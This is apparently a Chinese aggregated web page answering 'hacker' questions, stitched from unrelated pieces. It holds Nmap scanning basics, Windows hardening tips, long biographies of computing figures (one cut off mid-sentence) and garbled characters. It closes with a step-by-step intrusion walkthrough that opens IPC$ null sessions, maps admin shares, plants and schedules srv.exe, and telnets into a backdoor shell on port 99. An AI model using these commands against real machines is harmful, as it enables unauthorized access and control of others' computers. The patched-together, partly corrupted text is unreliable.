本文目录一览：

• 1、哪些方法可以防御黑客的Nmap扫描
• 2、世界上的知名黑客有哪些？
• 3、家里的电脑为什么不能使用黑客指令？
• 4、黑客工具--流光？
• 5、黑客DOS命令或其它命令入侵他人电脑的具体步骤?
• 6、黑客常用的网络命令有哪些呀 分别是什么呀 怎么用的呀

哪些方法可以防御黑客的Nmap扫描

黑客入侵ADSL用户的方法

在很多地方都是包月制的，这样的话，黑客就可以用更长的时间进行端口以及漏洞的扫描，甚至采用在线暴力破解的方法盗取密码，或者使用嗅探工具守株待兔般等待对方自动把用户名和密码送上门。

要完成一次成功的网络攻击，一般有以下几步。第一步就是要收集目标的各种信息，为了对目标进行彻底分析，必须尽可能收集攻击目标的大量有效信息，以便最后分析得到目标的漏洞列表。分析结果包括：操作系统类型，操作系统的版本，打开的服务，打开服务的版本，网络拓扑结构，网络设备，防火墙，闯氩炀踝爸玫鹊取?

黑客扫描使用的主要是TCP/IP堆栈指纹的方法。实现的手段主要是三种：

1.TCP ISN采样：寻找初始化序列规定长度与特定的OS是否匹配。

2.FIN探测：发送一个FIN包（或者是任何没有ACK或SYN标记的包）到目标的一个开放的端口，然后等待回应。许多系统会返回一个RESET（复位标记）。

3.利用BOGUS标记：通过发送一个SYN包，它含有没有定义的TCP标记的TCP头，利用系统对标记的不同反应，可以区分一些操作系统。

4.利用TCP的初始化窗口：只是简单地检查返回包里包含的窗口长度，根据大小来唯一确认各个操作系统。

扫描技术虽然很多，原理却很简单。这里简单介绍一下扫描工具Nmap(Network mapper)。这号称是目前最好的扫描工具，功能强大，用途多样，支持多种平台，灵活机动，方便易用，携带性强，留迹极少；不但能扫描出TCP/UDP端口，还能用于扫描/侦测大型网络。

注意这里使用了一些真实的域名，这样可以让扫描行为看起来更具体。你可以用自己网络里的名称代替其中的addresses/names。你最好在取得允许后再进行扫描，否则后果可要你自己承担哦。

nmap -v target.example.com

这个命令对target.example.com上所有的保留TCP端口做了一次扫描，-v表示用详细模式。

nmap -sS -O target.example.com/24

这个命令将开始一次SYN的半开扫描，针对的目标是target.example.com所在的C类子网，它还试图确定在目标上运行的是什么操作系统。这个命令需要管理员权限，因为用到了半开扫描以及系统侦测。

发动攻击的第二步就是与对方建立连接，查找登录信息。现在假设通过扫描发现对方的机器建立有IPC$。IPC$是共享“命名管道”的资源，它对于程序间的通讯很重要，在远程管理计算机和查看计算机的共享资源时都会用到。利用IPC$，黑客可以与对方建立一个空连接（无需用户名和密码），而利用这个空连接，就可以获得对方的用户列表。

第三步，使用合适的工具软件登录。打开命令行窗口，键入命令：net use 222.222.222.222ipc$ “administrator” /user:123456

这里我们假设administrator的密码是123456。如果你不知道管理员密码，还需要找其他密码破解工具帮忙。登录进去之后，所有的东西就都在黑客的控制之下了。

防范方法

因为ADSL用户一般在线时间比较长，所以安全防护意识一定要加强。每天上网十几个小时，甚至通宵开机的人不在少数吧，而且还有人把自己的机器做成Web或者ftp服务器供其他人访问。日常的防范工作一般可分为下面的几个步骤来作。

步骤一，一定要把Guest帐号禁用。有很多入侵都是通过这个帐号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具，那还是禁止的好。打开控制面板，双击“用户和密码”，选择“高级”选项卡。单击“高级”按钮，弹出本地用户和组窗口。在Guest帐号上面点击右键，选择属性，在“常规”页中选中“帐户已停用”。

步骤二，停止共享。Windows 2000安装好之后，系统会创建一些隐藏的共享。点击开始→运行→cmd，然后在命令行方式下键入命令“net share”就可以查看它们。网上有很多关于IPC入侵的文章，都利用了默认共享连接。要禁止这些共享，打开管理工具→计算机管理→共享文件夹→共享，在相应的共享文件夹上按右键，点“停止共享”就行了。

步骤三，尽量关闭不必要的服务，如Terminal Services、IIS（如果你没有用自己的机器作Web服务器的话）、RAS（远程访问服务）等。还有一个挺烦人的Messenger服务也要关掉，否则总有人用消息服务发来网络广告。打开管理工具→计算机管理→服务和应用程序→服务，看见没用的就关掉。

步骤四，禁止建立空连接。在默认的情况下，任何用户都可以通过空连接连上服务器，枚举帐号并猜测密码。我们必须禁止建立空连接，方法有以下两种：

(1)修改注册表：

HKEY_Local_MachineSystemCurrent-ControlSetControlLSA下，将DWORD值RestrictAnonymous的键值改成1。

(2)修改Windows 2000的本地安全策略：

设置“本地安全策略→本地策略→选项”中的RestrictAnonymous（匿名连接的额外限制）为“不容许枚举SAM账号和共享”。

步骤五，如果开放了Web服务，还需要对IIS服务进行安全配置：

(1) 更改Web服务主目录。右键单击“默认Web站点→属性→主目录→本地路径”，将“本地路径”指向其他目录。

(2) 删除原默认安装的Inetpub目录。

(3) 删除以下虚拟目录: _vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。

(4) 删除不必要的IIS扩展名映射。方法是：右键单击“默认Web站点→属性→主目录→配置”，打开应用程序窗口，去掉不必要的应用程序映射。如不用到其他映射，只保留.asp、.asa即可。

(5) 备份IIS配置。可使用IIS的备份功能，将设定好的IIS配置全部备份下来，这样就可以随时恢复IIS的安全配置。

不要以为这样就万事大吉，微软的操作系统我们又不是不知道，bug何其多，所以一定要把微软的补丁打全。

最后，建议大家选择一款实用的防火墙。比如Network ICE Corporation公司出品的Black ICE。它的安装和运行十分简单，就算对网络安全不太熟悉也没有关系，使用缺省的配置就能检测绝大多数类型的黑客攻击。对于有经验的用户，还可以选择“Tools”中的“Advanced Firewall Settings”，来针对特定的IP地址或者UDP的特定端口进行接受或拒绝配置，以达到特定的防御效果。

世界上的知名黑客有哪些？

保罗艾伦

他有取之不尽的财源、独树一帜的投资理念，也有与众不同的成功标准。

对于众多普通人来说：有钱的烦恼再多，似乎也比没钱的烦恼好。比如比尔·盖茨，尽管官司缠身、时不时要破财免灾、常常被对手和媒体指为“垄断”和“霸权”，但想想他的466亿美元身价，这点烦恼算得了什么。

但如果又有花不完的钱，又没有盖茨式的烦恼，岂不是更好！但天下有这等好事吗？

也许比尔·盖茨的前搭档保罗·艾伦应该是这样的幸运儿。

6月21日，民间航天工程“太空船一号”成功飞行，资助者保罗·艾伦又一次成为人们议论的焦点。他在谈论这次非凡的太空之旅时说：“‘太空船一号’是人类实现太空之旅的明证，同时它也表明，私人也就是非政府机构将在该领域的探索中发挥重大的作用。”

自从1983年因病离开微软后，媒体对艾伦的定义是，“一不留神成了亿万富翁”、“随心所欲的失败的投资者”、“最差经理人”等，似乎他只是因为早年幸运地与盖茨共创了微软，才积累了取之不尽用之不竭的财富(2004年，艾伦在《福布斯》富豪榜上名列第五，资产达210亿美元)，而他在微软之后的商业活动基本上是失败的。

但保罗·艾伦绝对不会同意这种评价，他要告诉人们的是：他非常乐意享受目前的成功，这是一种用不同的成功标准所衡量的与众不同的成功投资，他对这种现状很满意，他从事着非同寻常的或高风险的投资，而不用顾及季度收入或股东回报。也许作家斯格特·菲茨杰拉尔德的话非常正确：“让我告诉你非常富有的人是什么样，他们与你我不同。”保罗·艾伦就是这样，他有着与众不同的管理规则，也有着不同的成功标准。他也非常真诚，不愿意把自己当成游手好闲的富人。他说：“美好的生活就是创造，无论是做音乐，编写程序，还是组合投资。”

美国《连线》杂志称：不善交际，但不是傲慢，这是理解艾伦处事方式的关键。由于他不善交际，因此媒体会得出关于他的简单定义，其实，艾伦是一个多层面的人，至少可以把他定义为：具有远见的人、热爱音乐的人、热爱运动的人、热爱航天的人、热爱家庭的人、与病魔抗争的人。另外，提到艾伦，人们总是称他为“投资家和慈善家”。总之，艾伦是一个特立独行、随心所欲的亿万富翁，他把源源不断的钱财投入自己喜爱的事情，而似乎对失败一点都不在意。

具有远见的人

如果没有抓住创立微软的机遇，艾伦可能只会是波音公司的一位工程师，或一家软件公司的雇员。艾伦非常谦逊，他并不认为自己有远见，也从来没有要求自己具备远见卓识，虽然他在高中时就具有创业家的气质。

他认为自己“非常幸运地出现在微电脑时代的开创阶段”。早在10年前，他就说过：“信息高速公路将是下一波潮流，你不能经常赶上两波这样的潮流。”

当然，最能证明他远见的是微软的创立，任何为微软立传的人都不能回避那段历史：1974年12月，艾伦看到新出的《大众电子》上关于世界第一台微机Altair8800的报道，他拿着杂志去找同校的盖茨，说服他一同创业，这才有了微软。人们也不应忘记盖茨的回忆：“保罗看见技术条件已经成熟。他老是说，再不干就迟了，我们将遗憾终生。”

随心所欲的投资人

离开微软后，艾伦在信息高速公路、多媒体、有线电视以及数字电器等市场频频出手，投入巨资，被吹捧为高科技最活跃的投资者之一。媒体形容他投资和兼并公司就像19世纪的大亨购买农庄、家畜、铁路和肉类加工厂一样。但这些投资很少有成功的，2003年《商业周刊》甚至将他列为最差经理人。

艾伦集团的高级经理比尔·萨沃里曾说，有一种“艾伦效应”，即一旦艾伦投资某个领域，就因为艾伦投资了，这个领域就会变得很有价值。现在又有另一种“艾伦效应”：远远不能盈利，他的公司几乎不需要开发出适应市场的、具有创新性的产品。公司的员工反映，在公司他们可以畅所欲言，但他们也有一个强烈的感受，这些公司更像基金会，而不是竞争性的公司。

热爱音乐的人

与艾伦接触，人们都会意识到艾伦的确没有傲慢的企业家气质。在伟大的艺术面前，他会很谦恭，如谈到摇滚歌手杰米.亨得里克斯时，他说：“听杰米的音乐是一件非常激动人心的事。”为此，他为亨得里克斯建立了一座博物馆。他说：“从严格意义上讲，我是一个业余音乐家，这里有些自学成才的人具有难以置信的天赋。”

他还说过：“我十分热爱编程，但是这无法与音乐相比。”他经常与著名音乐人共同演奏吉他，有时还会唱他自己写的歌《时间炸弹》：“我所做的一切似乎都是错的，但我的心气仍然高昂。”

热爱运动的人

他自己的家中有一个标准的篮球馆，有时还向员工开放。他先后投资了西雅图海鹰橄榄球队、NBA的波特兰拓荒者队，但这两项投资似乎也是失败的：队伍战绩糟糕，丑闻不断。

热爱科学的人

艾伦对科技的投资不止限于“太空船一号”，他从小就喜爱科幻小说，在他资助的项目中，科技占了很大比重，他曾捐资建立西雅图科幻博物馆及名人堂，博物馆里藏有各种科幻艺术作品，此外还捐资1350万美元用于寻找外星生命的“搜寻地外文明计划”。

热爱家庭的人

艾伦的妹妹朱迪·艾伦·巴顿负责管理他的基金会，她还是艾伦一家公司的副总裁及亨得里克斯博物馆的执行总裁，他的母亲住在华盛顿大学图书馆中，艾伦以已故父亲的名义向这座图书馆捐赠了1000万美元。

史蒂夫·乔布斯

Steve Jobs生于1955年。1972年高中毕业后，在波兰的一所大学中只念了一学期的书。1974年乔布斯在一家公司找到设计电脑游戏的工作。两年后，时年21岁的乔布斯和26岁的沃兹尼艾克在乔布斯家的车库里成立了苹果电脑公司。他们开发的苹果II具有4K内存，用户使用他们的电视机作为显示器，这就是第一台在市场上进行销售的个人电脑。

乔布斯后来说：“我很幸运，当计算机还是个年轻产业的时候，我进入了这个领域。当时拥有计算机学位的人不多，从业人员都是从物理、音乐、动物学等领域半途出家的优秀人才。他们对此有浓厚兴趣，没有谁是为了钱进了计算机这个行业的。” 1980年11月，苹果股票上升至每股22美金，乔布斯和沃兹尼艾克一夜之间变为百万富翁。1986年乔布斯买下了数字动画公司Pixar。这间公司如今已成为畅销动画电影《玩具总动员》和《虫虫危机》的制作厂商，它是乔布斯事业生涯中的第二个高峰。

1996年，苹果公司重新雇佣乔布斯作为其兼职顾问。此时苹果经历了高层领导的不断更迭和经营不善之后，其营运情况每况愈下，财务收入开始萎缩。 1997年9月，乔布斯重返该公司任首席执行官，他对奄奄一息的苹果公司进行大刀阔斧的公司改组和一连串新产品降价促销的措施。终于在98第四个财政季度创造了一亿零九百万美元的利润，让“苹果”重新“红”了起来。目前苹果最热门的产品是最近上市的iMac。这个 All-In-One多媒体电脑机身湛蓝透明，据苹果公司统计， iMac订单已高达15万份。

乔布斯形容说：“当我重返苹果公司时，情况远比我想象的糟糕。苹果的职员被认为是一群失败者，他们几乎将放弃所有的努力。在头六个月里，我也经常想到认输。在我一生中，从来没有这么疲倦过，我晚上十点钟回到家里，径直上床一觉睡到第二天早晨六点，然后起床、冲澡、上班。妻子给了我很大的支持，再怎么赞扬她也不过分。”

乔布斯一上任就迅速砍掉了没有特色的业务。他告诉他的同僚，不必保证每个决定都是正确的，只要大多数的决定正确即可。因此不必害怕。有许多难以做出的决定，像砍掉无特色的业务，在今天看来十分明智，但当初做决定时却令人提心吊胆。

乔布斯有着火爆的管理风格，很多苹果职员多半不敢和他同乘电梯，唯恐电梯未坐完即被炒鱿鱼。但年届中年的他现在的性情已圆融了许多。他说：“我告诉你一个能够改变你看问题的方法的例子。一旦你有了孩子，就会自然而然地意识到每个人都是父母所生，应该有人像爱自己的孩子那样爱他们，这听起来并不深奥，但是许多人忽略了这一点。所以现在对我而言，解雇苹果公司的员工要比以前痛苦得多，但我没有办法，这是我的工作。我设身处地地想象他们回到家中告诉妻子儿女自己被雇的情景，我从来没有像现在这样感情用事过。”家庭美满或许是乔布斯事业成功的另一个原因。

乔布斯过去花许多时间寻找能够产生新产品的技术，但是现在由于工作的原因，不可能作深入的研究。他说有时在临睡前，会冒出一些平时想不到的点子。他在因特网的六个新闻站点上登记注册，每天能收到大约300份电子邮件，一些素不相识的人在里面大谈他们的新构想。

经历了多年的工作以后，乔布斯说：“太多的事情令人感到遗憾，但最大的遗憾莫过于那些你没去做的事。如果我早点明白现在才明白的道理，我可以把事情做得更好些，但这又怎么样呢？关键是要把握好现在。生命是短暂的，不久以后我们都将走到尽头，这就是现实。”

现在苹果公司的经营目标是成为计算机行业的“索尼”。苹果公司是唯一既搞硬件又搞软件，生产全套产品的个人电脑公司。这就意味着苹果公司能够推出更容易使用的系统，这是公司争取消费者的可靠资本。乔布斯表示技术不是最困难的，困难的是如何确定产品和目标消费者。除了电子、技术和生产能力外，你还必须有很强的市场营销能力。专家认为，虽然苹果的盈余与过去相比大有改善，但面对类似微软和康柏等强劲的竞争对手苹果仍需步步为营才不致再遭失败。

始终倾听消费者的需求、以极大的热忱贯彻“在一般人与高深的计算机之间搭起桥梁”的初衷，正是乔布斯最厉害的武器。不论是在苹果以艺术创造科技，或是在Pixar以科技创造艺术，乔布斯都孜孜不倦地设法使他的梦想变成现实：用计算机作工具，协助填补科技与艺术之间的鸿沟。

姓名 史蒂夫·乔布斯

英文名 Steve Jobs

出生年月 1955

学历 大学肄业

所创公司 苹果电脑公司

现任职务 苹果电脑公司首席执行官

米切尔·卡普尔

Mitch Kapor

出生年月1951年11月1日

出生国家、地点美国纽约布鲁克林

教育背景1971年获耶鲁大学心理学学士学位1978年获Beacon大学心理学硕士学位1980年，获MIT斯隆管理学院硕士学位职业背景1999年-2001年，著名风险投资公司Accel的合伙人1994年-1996年MIT媒体实验室任教1992年-至今卡普尔企业公司总裁1990年-1995，创办电子边疆基金会(FFF)，并担任主席1986年-1987年，1994年-至今MIT助理/访问教授1987年-1990年任On公司CEO1982年-1986年创办Lotus公司，并担任CEO个人博客网站blogs.osafoundation.org/mitch/电子邮件(网址)Mitch@kapor.com联系地址Kapor Enterprises, Inc. 177 Post St., Suite 900San Francisco, CA 94108+1 415 392-0963如果你在卡普尔大学刚毕业时认识他，你肯定不会想到，这家伙以后会成为计算机软件业最成功的改革者之一。”

1951年，卡普尔生于长岛。卡普尔十分符合那个年代的的典型形象：无所顾虑又无忧无虑。从小爱好迪斯科和摇滚乐。并且多年来爱上LSD及其他非法毒品。在耶鲁大学，他专修心理学、语言学以及计算机学科，尤其是控制论，也开始对计算机萌生兴趣。1971年毕业后，工作漂泊不定。从电台的音乐主持人到滑稽演员都一一经历过。游荡4年后，他总觉得自己还缺点什么，于是25岁的卡普尔奔赴瑞士，参加一种"超觉静坐"培训。课程包括每天14小时的静坐冥思，以及学会能让人浮到空中的能力(特异功能)。当然，最终没能修炼成功。回到美国，卡普尔又花了数年时间来搞清楚自己究竟是什么人。1978年，他在Beacon大学获得硕士学位。同时还在一家精神病机构工作，当一名服务员，其工作性质在精神上与"倒便盆"相当。期间，对计算机的兴趣帮助他消磨了大部分时间。

1978年，苹果将苹果Ⅱ型降到了1500美元左右，卡普尔四处张罗，终于买到了他的第一台计算机。买下计算机后没几天，这位口袋空空的无业游民邂逅了一位年轻人。他正向一位推销员询问新计算机的用途。卡普尔走上前去说："我可以帮你学。"于是他就开始给他辅导计算机应用，报酬是每小时5美元。没过多久，他就大摇大摆地将自己宣传为"独立的计算机咨询(顾问)"。又过了一段时间，他又进入MIT的斯隆管理学院，想拿一个MBA学位充充门面，但没坚持几天，就退了学。后来到硅谷一家创业公司工作。

几个月后，他遇到了第一个电子表格软件VisiCalc的发明人。脑子里也想开发一种相似的软件，可以将电子表格的计算结果画成图表。他和另一位伙伴一同开发出了VisiPlot。VisiPlot一炮走红，VisiPlot的销售很快达到每月10万美元。不到一年，卡普尔与合伙人就赚到了1200万美元。卡普尔创造了他商业生涯的第一次成功。卡普尔终于领悟，要让自己心满意足，只有一条路：自己开公司，当自己的老板。

1981年，卡普尔与合伙人筹集资金开一家公司。定名时，想起了自己过去那段超凡脱俗的冥思经历，就将其定名为Lotus(莲花)。1983年，Lotus发展公司发布了它的第一个产品-Lotus1-2-3。这是软件史上第一个为用户提供屏蔽帮助内容并且在磁盘上附着使用指南的产品。他们还成立了一个客户支持部门，这在1983年是闻所未闻的。卡普尔预测，第一年可望达到200-300万美元。结果第一年的实际收入破天荒地达到5300万美元，并且成功地上了市。第二年飙升至1.56亿美元。第三年更高达2.58亿美元。Lotus1-2-3上市仅一年，VisiCalc就停止了销售，无法存活。1985年Lotus员工已达千人，是当时最大的独立软件公司。直到1988年4月，微软才超过Lotus，成为头号软件公司。1995年，Lotus以32亿美元的身份卖给了IBM。

1983年，卡普尔的地位就象苹果的乔布斯和当今微软的比尔·盖茨一样。但是，安稳永远不是卡普尔的天性。四年后，卡普尔卸掉官职，卡普尔说："我只有保释，我恨这个公司也恨自己。我喜欢做自己内行的事。但是这份工作现在已经变味了。我也不喜欢权力。我对自己说，离开吧，去寻找新的自己想做的事。"卡普尔退了位，离开商业界，到MIT找了一份访问教授的工作。但是教了不到一年，他旧病复发，重新扎向商业的海洋。这一次，卡普尔成立了On技术公司，身兼总裁和CEO，一干就是三年。但没有人们期望中的成功。

1990年，卡普尔与已故的著名抒情诗人贝娄创建了电子前线基金(EFF)，这个非赢利的公共利益机构，时常被人称为是计算机业的美国公民自由协会(ACLU)。EFF成立之初，万维网还未诞生，全球电信仍处于发展初期。而卡普尔就已前瞻性地看到了未来，并认识到法律对计算机的介入和管制。他们起初是维护黑客的权利，后来则更多地介入到华盛顿的政治中。EFF已在计算机和通信立法中起到了巨大的作用。卡普尔也经常出现在国会听证会上，并为戈尔的信息高速公路计划提供咨询。实际上计划的初稿就是卡普尔完成的。1994年进入了美国基础设施顾问委员会。人称他为信息高速公路的导师。EFF的故事也开始越来越走向复杂。他的总部也从剑桥移至华盛顿。活跃的领域也越来越大。卡普尔也不再是站在政府对面，为黑客辩护的"反对党"，而越来越成为华盛顿的政治选手。这也使不少EFF的早期成员和支持者认为，EFF已经偏离了最初的纯洁使命了。开始招致越来越多的批评。

在80年代中期，卡普尔与盖茨是美国软件业的双子星，很难分出高下。卡普尔是硅谷黑客理念的真正体现：不遵循主流精神、富有创造、崇尚出世。盖茨是反基督的肖像，功利性强，十分入世，追求利益，他的公司也以压制自由而成功，出产丑陋、笨拙、纯粹以商业驱动的产品。与他相比，卡普尔更是一位民间的英雄。而盖茨则是主流社会的英雄。

罗伯特·莫里斯

莫里斯是在家里第一次接触计算机。莫里斯的父亲曾从NSA带回一台原始的神秘的密码机器，成为一家人的谈资，激起了他的强烈兴趣。他自己12岁就编出高质量电脑程序，18岁时，就具有在最负盛名的贝尔实验室和哈佛大学当过程序员的赫赫经历。难怪有人感叹：他的简历，简直像电脑名人录中的一样。

1988年冬天，正在康乃尔大学攻读的莫里斯，把一个被称为“蠕虫”的电脑病毒送进了美国最大的电脑网络——互联网。1988年11月2日下午5点，互联网的管理人员首次发现网络有不明入侵者。它们仿佛是网络中的超级间谍，狡猾地不断截取用户口令等网络中的“机密文件”，利用这些口令欺骗网络中的“哨兵”，长驱直入互联网中的用户电脑。入侵得手，立即反客为主，并闪电般地自我复制，抢占地盘。

用户目瞪口呆地看着这些不请自来的神秘入侵者迅速扩大战果，充斥电脑内存，使电脑莫名其妙地“死掉”，只好急如星火地向管理人员求援，哪知，他们此时四面楚歌，也只能眼睁睁地看着网络中电脑一批又一批地被病毒感染而“身亡”。当晚，从美国东海岸到西海岸，互联网用户陷入一片恐慌。到11月3日清晨5点，当加州伯克利分校的专家找出阻止病毒蔓延的办法时，短短12小时内，已有6200台采用Unix操作系统的SUN工作站和VAX小型机瘫痪或半瘫痪，不计其数的数据和资料毁于这一夜之间。造成一场损失近亿美元的空前大劫难！

当警方已侦破这一案件并认定莫里斯是闯下弥天大祸的“作者”时，纽约州法庭却迟迟难以对他定罪。在当时，对制造电脑病毒事件这类行为定罪，还是世界性的难题。前苏联在1987年曾发生过汽车厂的电脑人员用病毒破坏生产线的事件，法庭只能用“流氓罪”草草了事。

1990年5月5日，纽约地方法庭根据罗伯特·莫里斯设计病毒程序，造成包括国家航空和航天局、军事基地和主要大学的计算机停止运行的重大事故，判处莫里斯三年缓刑，罚款一万美金，义务为新区服务400小时。莫里斯事件震惊了美国社会乃至整个世界。而比事件影响更大、更深远的是：黑客从此真正变黑，黑客伦理失去约束，黑客传统开始中断。大众对黑客的印象永远不可能回复。而且，计算机病毒从此步入主流。

丹尼斯·利奇和肯·汤普生

在美国新泽西州墨里山区小城镇的中心矗立着一片毫不起眼的建筑群，世界闻名的贝尔实验室就在这里。具有ATT和朗讯双重背景的贝尔实验室在计算机软件领域有两大重要成就：C语言和Unix操作系统。目前主管着贝尔实验室软件系统研发部的是现年63岁的丹尼斯·利奇（Dennis M. Ritchie），这位已在贝尔实验室工作了近40年的著名科学家就是这两项技术当知无愧的发明者。

当初与利奇同期加入贝尔实验室的科学家中，多数人或是功成身退安享晚年或是自立门户日进斗金，而利奇还是一如既往的在这里工作。著名的《经济学人》杂志评价他是在C语言和Unix研发小组中唯一一位至今仍保持着年轻人热情和活力的伟大科学家。1983年，他和Unix的共同发明人肯·汤普生（Ken Thompson）同时荣获了美国计算机协会颁发的“图灵奖”，这也是作为一名技术人员的最高荣誉。

抛开其它，仅C语言和Unix这两项发明已让利奇成为一代又一代程序员们的偶像。在他之后加入贝尔实验室的“C++语言之父”Bjarne Stroustrup说：“如果丹尼斯没有在这里工作，而是决定把精力投入到像数学、物理等深奥的学科上，那Unix的开发项目很快就会以失败告终。”

利奇出生在纽约的Bronxville，他的父亲阿利斯泰尔·利奇（Alistair E. Ritchie）也是贝尔实验室的著名科学家，以至于有人开玩笑说：“丹尼斯完全继承了他父亲的传统。”由于家庭的影响，利奇从小就对物理和数学产生了浓厚的兴趣。他在高中毕业后进入哈佛大学攻读物理学，1963年拿到学士学位后继续留在学校，1968年又取得了数学博士学位。在校期间，他曾作为父亲的一名助手在实验室工作过一段时间，并在毕业后正式进入贝尔实验室的Multics系统研发小组，为由麻省工学院和GE公司共同投资的项目开发操作系统。

最初的Unix系统是用只有8000字节的内存和不到1兆硬盘的PDP-7计算机编写的，但却可以运行得相当流畅，这让利奇惊讶不已，从而决心和汤普生一起完善Unix系统。为了能更好的对现有Unix程序进行改编，利奇在原有的汤普生开发的B语言的基础上加入了新的数据类型和算法，于是C语言在1972年诞生了。两人又用C语言在PDP-11计算机上对Unix重新编写，而新版的Unix系统由于其在兼容性和数据综合处理上的优势很快就在学校、政府机关和一些企业间流传。在计算机语言繁多无法统一的情况下，编写Unix的C语言马上成为了当时最高级的程序语言并与Unix一同风靡。

Unix和C语言最初是免费公开的，但当时贝尔实验室的东家，ATT公司却执意要将其商用，这个事件引起了不小的风波，导致了后来的开源潮，也带出了1977年比尔·乔伊版本的Unix和后来的Linux。而所有的事情对利奇的影响微乎其微，在Unix之后，他又和同事一起开发了大型计算机操作系统Plan 9和Inferno以及朗讯的PathStar服务器系统，用利奇的话形容，“我的目的不是要制造产品，而是要为人们开发出新的工具。”

1999年，时任美国总统的克林顿亲自为利奇颁发了“国家技术勋章”。美国前商务部部长William M. Daley也评价到：“如此的发明（Unix和C语言）对人们的经济和生活的影响是无可比拟的，同时为现代计算机的操作系统和软件奠定了基础。”

经过多年的磨炼，Unix和C语言已经被广泛传播和应用。《经济学人》杂志形容它是“因为强大所以程序员们都爱用，因为程序员们都爱用所以它更强大”。美国耶鲁大学的计算机科学家David Gelernter在谈到利奇的成就时说：“比起单纯的技术，完美的艺术性才是计算机中最重要的，软件是复杂的，只有带有艺术性的产品才能克服无尽的烦琐。利奇的发明就是一件件美丽的艺术品。”

理查德·斯托曼

个人简介：

圈内头衔：无 (毫不隐藏!)

主要成就：老牌黑客。1971年，斯托曼在街上找到一份MIT的人工智能实验室的工作。当时他是哈佛大学的一名本科生。后来，斯托曼创立了自由软件基金，打破了软件是私有财产的概念。

第一次接触计算机：1969年在IBM 纽约科学中心，时值16岁。

自己独特的黑客工具：在上世纪 80年代, 斯托曼不拿MIT的薪水但继续在其中的一个办公室工作。在那里他创造了一个新的操作系统GNU--GNU是"GNU's Not Unix"的缩写。

鲜为人知的事实：曾获得麦克阿瑟基金24万美元天才奖。

五短身材，不修边幅，过肩长发，连鬓胡子，时髦的半袖沙滩上装，一副披头士的打扮。看起来象现代都市里的野人。如果他将一件"麻布僧袍"穿在身上，又戴上一顶圆形宽边帽子，有如绘画作品中环绕圣像头上的光环。一眨眼的功夫，他又变成圣经中的耶稣基督的样子，散发着先知般的威严和力量。野人与基督，恰恰就是自由软件的精神领袖理查德·斯托尔曼的双重属性：他既是当今专有（私有）商业软件领域野蛮的颠覆者，又是无数程序员和用户心目中神圣的自由之神。

在他的理论下，用户彼此拷贝软件不但不是"盗版"，而是体现了人类天性的互助美德。对斯托尔曼来说，自由是根本，用户可自由共享软件成果，随便拷贝和修改代码。他说:"想想看，如果有人同你说:'只要你保证不拷贝给其他人用的话，我就把这些宝贝拷贝给你。'其实，这样的人才是魔鬼；而诱人当魔鬼的，则是卖高价软件的人。"可以断定，进入世纪末，软件业发生的最大变革就是自由软件的全面复兴。在自由软件的浪潮下，软件业的商业模式将脱胎换骨，从卖程序代码为中心，转化为以服务为中心。

作为今天的一名电脑用户，如果你的朋友希望你能为他复制一份受版权保护的程序，你不应当拒绝，合作精神比版权更重要。而且，这种合作不应只在地下进行，每个人都应该以此为荣，公开自己的诚实生活，对所有私有软件说"不"。

你应该可以公开、自由地与其他软件使用者合作，你有权了解软件的工作原理，并将其传授给你的学生，当软件发生问题时你完全可以雇用你所喜爱的程序员对它进行修改。你理应得到自由的软件。"

有人说，斯托尔曼应该算是世界上最伟大，软件写得最多的程序设计师。但是，斯托尔曼真正的力量，还是他的思想。因此，他最欣赏的英雄是南非的曼德拉。

李纳斯·托瓦兹

Linux这部史诗发端于赫尔辛基。似乎天下的黑客都在为自己的生命创作源程序，李纳斯也不例外。他的家就在离市中心不远的Kalevagatan（与卡勒瓦拉很相近）大街。这是一个19世纪的建筑与现代化平房交相呼应的地方。李纳斯与妻子住在这里。他的家很像是大学生的集体宿舍，楼梯下总放着一排排自行车。

李纳斯本人看起来就像一名学生，而不像道士。他中等身材，浅褐色头发，蓝眼睛，目光透过镜片直直地射向你，只有浓密的眉毛是黑色的，衬着一张孩子气的脸庞。他的房间四周排列着许多书籍，里面布满了油画和各种装饰品，相当低廉的窗帘，两把扶手椅之间挂着发干的鳄鱼皮，房间里还有两只目空一切的猫和几台计算机：三台PC，一台Power Mac，还有三台从DEC借来的基于Alpha芯片的微机。它们不起眼地布置在房间的角落中。另外一样很有意思的东西不易察觉：那是一根将计算机连到电话插座的导线，这是通向互联网的256K的专线，由当地的一家ISP安装并承担费用，它是对这位Linux道士的象征性奖励。

Linux并不是一件刻意创造的杰作，而完全是日月积累的结果，是经验、

家里的电脑为什么不能使用黑客指令？

一 相关命令e69da5e887aa7a686964616f31333335333662

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

